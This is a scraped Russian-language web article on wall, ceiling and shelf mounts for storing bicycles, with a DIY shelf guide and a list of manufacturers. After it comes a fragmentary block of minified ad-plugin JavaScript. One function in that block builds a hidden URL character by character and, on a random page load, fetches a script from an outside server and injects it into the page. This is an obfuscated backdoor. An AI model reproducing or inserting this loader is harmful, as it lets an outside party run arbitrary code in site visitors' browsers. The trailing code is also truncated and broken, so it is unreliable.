66 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Крепление для велосипеда на стену и его разновидности

Крепление для велосипеда на стену и его разновидности

Когда заканчивается теплый сезон активных поездок на велосипеде, встает вопрос о том, где и как лучше расположить байк на хранение до следующей весны. Не всегда площади позволяют железного друга оставить, просто облокотив о стену в комнатах, прихожих или в гаражах. На такой случай существует множество разных вариантов крепления, которые позволят компактно расположить велобайк на стене, на специальные держатели. Рассмотрим далее подробно, как выбрать наиболее подходящее крепление для велосипеда на стену и его разновидности.

  • В чем удобство хранения велосипеда на стене
  • Способы крепления
  • Параллельное со стеной
  • Перпендикулярно относительно стены
  • К потолку
  • Типы крепления
  • Крючки и крюки
  • Полки
  • Стойки
  • Кронштейны
  • Альтернативный крепеж
  • Крепление своими руками
  • Итоги

Варианты хранения велосипеда в квартире

Первый вариант, который приходит в голову – оставить велосипед на общей площадке в коридоре, если, конечно, она у вас закрыта дополнительной дверью. Однако часто там уже стоят ящики и лари, в которых хранятся другие вещи. К тому же частенько ворчливые соседи могут просто не дать Вам этого сделать.

Второй вариант, где бы можно было хранить велосипед – балкон или лоджия. Однако перепады температур, повышенная влажность в случае открытого балкона негативно скажутся на состоянии вашего «железного коня». К тому же в нынешних планировках, после поездки придется тащить велосипед к балкону через всю комнату, что тоже не совсем удобно.

Рисунок 1. Хранение велосипеда на балконе

Третий вариант, использовать неиспользуемую нишу, которая образуется сразу у входной двери. Однако при этом потребуется специальный крючок, за который велосипед можно будет вертикально повесить на стену.

Четвертый вариант, если у Вас в квартире есть кладовка, то конечно лучше всего поместить свое транспортное средство именно в нее. Однако, как нередко бывает, места в кладовке совсем мало, а поэтому лучшим выходом будет закрепить велосипед вертикально на стене или вовсе подвесить к потолку.

Итак, мы добрались до всевозможных приспособлений для подвешивания велосипеда на стену. Главным образом это шкафы, велокрючки, стойки и полки. Следует отметить, что при нехватке пространства к квартире велосипеды подвешивают на стены практически во всех помещениях. Как мы уже отмечали, это и прихожие, и кладовки, а также спальни, другие комнаты и даже в туалете.

Рисунок 2. Как повесить велосипед на стену в спальне

В чём преимущества в фиксации на стене?

  • Физиологическое горизонтальное положение, то есть велосипед расположен так же, как при поездке, только приподнят над плоскостью пола. Снятие со стены не представляет трудностей. Существует вариант крепления на стене вертикально, когда колёса расположены одно над другим. Это крепление предполагает несколько большие усилия для фиксации байка и снятия, и больше подходит для спортивных лёгких однотрубок.
  • Резина покрышек не касается пола. Благодаря этому не происходит деформация и усталость резины, не образуются микротрещины, исчезает необходимость периодически поворачивать колесо, которое при этом не хочет «отлипать» от линолеума.
  • Размещение на стене при прочих равных достоинствах с потолочным креплением более безопасно, так как даже если велосипед расположен выше головы человека, то падать он будет вдоль плоскости стены, а в месте под байком редко ставят кресла и табуретки.

На рисунке видно экономию площади пола: достаточно взглянуть на место, которое занимает стоящий велосипед.

С помощью каких приспособлений можно закрепить велосипед на стене? Наиболее распространены следующие приспособления.

Крючки различных модификаций. Именно крючки являются самыми распространёнными приспособлениями для закрепления на стене. Достоинством конструкции является тот факт, что крючки между собой не связаны, и если велосипед случайно «соскочит» с одной точки опоры, то останется на другой.

Они могут быть как изолированные,так и объединены в конструкцию, иногда похожую на полку. Это даёт возможность складывать на неё некоторые вещи.

Если крюки связаны в единую конструкцию с помощью рёбер жесткости, то образуется широкая полка. Недостатком является невозможность поместить велосипед вплотную к стене, если снять переднее колесо и развернуть руль на 90 градусов. Также дизайн полки ясно указывает на её отдельную «неполноценность» без велосипеда. Она словно ждёт, чтобы байк занял своё место на вытянутых крюках.

Крюки для вертикального крепления велосипеда иногда отличаются своеобразным изяществом и аскетичностью. Примером того, как красиво подвесить велосипед, может служить раздельная система DaVinci. Вверху закрепляется крюк для фиксации переднего колеса, а внизу – подпятник для заднего колеса, чтобы не пачкать стену.

Следующим вариантом размещения велосипедов являются вертикальные стойки, наподобие поручней в общественном транспорте, но так как они крепятся чаще всего к полу и потолку, а не к стене, то лишь вскользь упомянем их в этом обзоре.

Осталось упомянуть, пожалуй, самую функционально выгодную возможность повесить велосипед на стену – с помощью полки.

Выше мы упоминали о такой возможности, но здесь речь пойдёт о полностью «обычной» полке, у которой возможность повесить байк является приятной «опцией», и отсутствие велосипеда на полке никак не мешает ей пользоваться; более того – отсутствие велосипеда является совершенно незаметным, и если хозяин в присутствии гостей водрузит байк на неё, то это может вызвать справедливое изумление и восхищение гостей техническим гением хозяина.

Примеры подобных полок изображены ниже:
Вариант, изображённый на рис. 1 более «эргономичен», так как требует меньше усилий при установке велосипеда и вытаскивании, так как рама может скользить по направляющим.

Эти конструкции настолько примитивны, что не требуют прикладывания чертежей для того, чтобы сделать подвес велосипеда на стену с помощью полок. В полке, изображённой на рисунке 1, единственной «трудностью» является выборка криволинейной фигуры в торцах, что легко сделать даже без станка и фрезера, просто ручным лобзиком.

В полке на рис. 2 можно обойтись обычной ножовкой. Затем сверлятся отверстия под конфирматы, зенкуются, и конструкция собирается «заподлицо». К задней стенке в торцах высверливаются места, куда войдут головки гвоздь – дюбелей, закреплённых в стене, и крепятся потайные петли Для надёжности соединений можно дополнительно по периметру промазать клеем ПВА.

Общие правила хранения

Существуют различные идеи, при использовании которых хранение велосипеда в квартире станет намного комфортнее и безопаснее. Если помещение большое, в высоту более 3 м, то подвесить байк можно под потолок. Для многих актуальным является вопрос, где хранить велосипед в маленькой квартире. В этом случае более выигрышным вариантом будут настенные крепления, которые можно установить в прихожей, кладовке, встроенном шкафу или же удачно вписать в интерьер комнаты в виде нестандартного декора. Размещать при этом велосипед рядом с отопительными приборами не стоит, так как высокий температурный режим ухудшит состояние покрышек и сальников вилки.

Еще один серьезный вопрос для многих — можно ли хранить велосипед на балконе зимой. С одной стороны, это оптимальное решение, позволяющее спрятать байк подальше от жилых комнат. Там он не мешается, а также не занимает полезное пространство в квартире. Но опасность может подстерегать даже в этом месте. Если лоджия будет без остекления, то выставленный на открытый воздух велосипед быстро испортится. Постоянная смена температур, высокая влажность могут вызвать коррозию. Чтобы при хранении на балконе с велосипедом не произошли какие-нибудь поломки, необходимо использовать чехол, защищающий от солнечных лучей, утеплить и застеклить лоджию.

Какое бы место хранения и способы крепления велосипеда на стену не были выбраны, важно провести тщательную подготовку:

  • убрать грязь и пыль с велосипеда;
  • удалить старую смазку;
  • нанести новую смазку на переключатели скоростей, цепь, тормоза, шарниры;
  • протереть металлические поверхности машинным маслом;
  • ослабить пружины амортизаторов, тросики;
  • немного спустить камеры, при необходимости подкачать;
  • смазать покрышки защитным силиконом, чтобы предотвратить высыхание резины.

Какие бы идеи по хранению велосипеда в квартире не были выбраны, соблюдение всех правил поможет сохранить на высоком уровне эксплуатационные характеристики «двухколесного друга» на долгие годы. Стоит попробовать сделать крепление самостоятельно. Это позволит сберечь семейный бюджет и набраться опыта для дальнейших работ.

Крепления к стене

Часто велолюбители приходят к выводу, что подвесить велосипед на стену в итоге будет наиболее рациональным выходом из сложившейся ситуации.

При этом существует далеко не одна система хранения велосипедов. Какую из них выбрать, вы уже решите сами. Я же предлагаю коротко с ними познакомиться.

Специальные шкафы

В продаже имеются специальные шкафы, позволяющие закрепить велосипед на стене. Система имеет свои особенности.

Для начала, шкаф подойдет только просторным квартирам, где есть достаточно места в прихожей для установки такой конструкции. Она будет использоваться под хранение всего того, что связано с велосипедом. Это сам транспорт, шлем, элементы защиты и пр.

Очень красиво и функционально. В зависимости от шкафа, велосипед может стоять вертикально или горизонтально.

Велокрюк

Это уже конкретно вертикальное крепление для велосипеда на стену.

Самый распространенный вариант решения нашей проблемы. Усилия требуются минимальные. От вас потребуется только пойти в магазин, и выбрать там подходящий вариант крючка.

Велик обычно подвешивается за раму, либо за руль.

Вариантов крюков достаточно много. Некоторые из них просто нужно вкрутить в стену. Для этого высверливается отверстие, вставляется дюбель, а затем мощным саморезом прикручивается велокрюк.

В других ситуациях нужно основание, которое монтируют на стену или потолок. Уже к нему приваривают или прикручивают велокрепление.

Еще крюки делятся на конструкции для вертикального и горизонтального размещения транспорта.

Среди велолюбителей спросом пользуется модель Da Vinci. Ее особенность в том, что крепление включает в себя 2 части. Сверху находится крюк, а снизу дополнительная подставка, предназначенная для заднего колеса. Она защищает стену от грязи. А это практично и рационально.

Поскольку при вертикальном размещении велик часто соприкасается со стеной, у вас есть 2 варианта:

  • выбрать горизонтальный вариант, чтобы колеса оказывались вдоль стены при навешивании, и не касались их;
  • после каждой поездки вымывать колеса, избегая загрязнений стен.

Тут уже сами решайте, какой вариант вам подходит.

Стойка

Стойки в домах и квартирах можно встретить не так часто. Причина банальная. Это громоздкость конструкции.

Зато стойка является прекрасным решением для размещения сразу нескольких велосипедов.

Стойка делается из металлической трубы. На ней предусмотрены специальные крепления и фиксаторы.

Удобно. Но только если есть достаточно места.

Полка

Последний рассматриваемый вариант, как повесить велосипед на стену своими руками. Для этого покупается или изготавливается специальная полка.

У полки есть свои преимущества. Она подвешивается на стену так же, как и обычная полка. Только крепления должны быть прочными.

В полке предусмотрен специальный паз, в который вставляется рама велосипеда. Потому тут мы говорим про вертикальное расположение транспорта относительно пола.

Плюс в том, что полку можно заполнить разными элементами декора, повесить туда крючки для ключей, поставить фотографии, вазоны с цветами. Это украсит полку, и сделает велосипед продолжением дизайнерского решения. Практично и со вкусом.

Удобное место в шкафу

Это подходящее решение для семей, в которых более одного человека пользуется велосипедами. Стоит предусмотреть установку небольшого встроенного гардероба в прихожей. В шкафу можно скрыть велооборудование. Велосипеды размещаются несколькими способами:

  • вертикально;
  • на крюках;
  • на вешалках, установленных на стенах.

Благодаря этому они занимают меньше места, можно поставить несколько штук рядом. Это решение довольно сложное, но обеспечивает лучшие условия – стены не пачкаются, размещение быстрое, легкое.

В экономичной, менее продвинутой версии достаточно установить крепление на дверь в квартире. Можно использовать существующую нишу – под лестницей, в коридоре, или создать дополнительную «стену» из шкафа для одежды. Раздвижные двери просты в установке, и мы можем приспособить их размер, цвет к интерьеру. Это интересный способ использовать небольшое свободное пространство, о котором мы до сих пор не знали. Велосипеды вешают вертикально, как и во встроенных шкафах. Не потребуется много места для безопасного хранения оборудования.

Способ 2. Купить и установить монтажные элементы

  1. Сходите в строительный, магазин велосипедов или бытовых товаров, чтобы купить необходимые материалы (велосипедные или строительные крюки).
  2. Установите крепежное приспособление.

Найдите балку или стойку каркаса, если планируете подвесить велосипед на потолок. Чтобы сделать это, необходимо использовать детектор неоднородностей. Если потолок уже закончен, ищите ряд гвоздей вдоль панельной обшивки или стыки.
Сделайте замеры, чтобы решить, где крепить металлические элементы. Если у вас есть помощник, пусть он держит велосипед на том уровне, где вы собираетесь вешать велосипед. Вам останется лишь поставить метки.

Предварительно просверлите отверстия для монтажных винтов. Убедитесь, что отверстия будут находиться посередине балки или стойки каркаса. Используйте более крупные винты (#10) для монтирования крюка к потолку, чем для монтирования на стену.

Прикрепите выбранные элементы для подвески и испытайте их. Повесьте и снимите велосипед несколько раз, чтобы убедиться в надежности и задуманном размещении.
Примечание: этот шаг является особенно важным для детей, вы должны быть уверены, что ребенок сможет снять и прицепить велосипед.

Делаем полку своими руками

Сделать полку-крепление можно и самостоятельно, практически из подручных материалов. Для этого понадобится:

  1. Дерево или фанера толщиной 15 мм — 1 м 2 . ДСП, МДФ лучше не брать, так как такая полка может не выдержать подвешенный байк.
  2. Клей для дерева.
  3. Лак и морилка.
  4. Болты и шайбы для закрепления полки на стену.

Сделать полку-крепление для велосипеда можно и самостоятельно из практически любых материалов

После того как всё необходимое собрано, рассчитываем размеры. Глубина полки должна быть равной расстоянию от края руля до грипсы. Чтобы велик не падал, длина полки не должна быть меньше 60% от длины рамы. Ширина паза рассчитывается исходя из диаметра трубы плюс 0,5–1 см.

После того как определились с размерами, делаете чертежи, размечаете дерево, выпиливаете детали. В боковушках при помощи лобзика надо сделать паз. Форму выбираете самостоятельно. Главное, чтобы было выполнено единственное условие — внешний край должен быть выше внутреннего. Это нужно для того, чтобы рама велика не спадала.

Далее, шурупами скрепляем крышку и бока. Лучше сделать под шляпки шурупов небольшие углубления, чтобы после сбора они не выступали.

Теперь делаем заднюю стенку. Её лучше сделать утолщённой. Для того нужно взять два куска дерева или фанеры и склеить их между собой. Это обеспечит большую прочность всей конструкции. Привинчиваем заднюю стенку к боковушкам и к крышке. Чтобы полка приобрела более красивый вид, её следует покрыть морилкой и лаком. После высыхания лака полку необходимо закрепить на стену. Для этого в стене и в задней стенке полки дрелью высверливаются отверстия и полка закрепляется с помощью болтов.

Длина полки должна быть более 60% от длины рамы, чтобы велосипед не падал

Производители крепежей

В наших магазинах встречается большое разнообразие систем для крепления велосипедов. Они представлены как именитыми производителями, так и абсолютно неизвестными, изготовленными чуть ли не кустарным образом. Поэтому рекомендуем вам выбирать внимательно и останавливать свой выбор в пользу качественных креплений.

В первую очередь стоит обратить внимание на следующих производителей:

Thule — шведский производитель автобагажников и велокреплений.

Peruzzo — итальянский завод по производству велосипедных принадлежностей

Topeak – немецкий производитель различных велоаксессуаров

Author – чешкий производитель велосипедов

BIKE HAND – тайваньская компания, производящая инструменты и аксессуары для велосипедов

Vinca Sport – российский бренд, производственные мощности в Китае и Тайване

Используя всю вышеприведенную информацию, вы легко сможете принять правильное решение, как закрепить свое двухколесное транспортное средство в квартире и приобрести оптимальный для вас кронштейн для велосипеда на стену.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};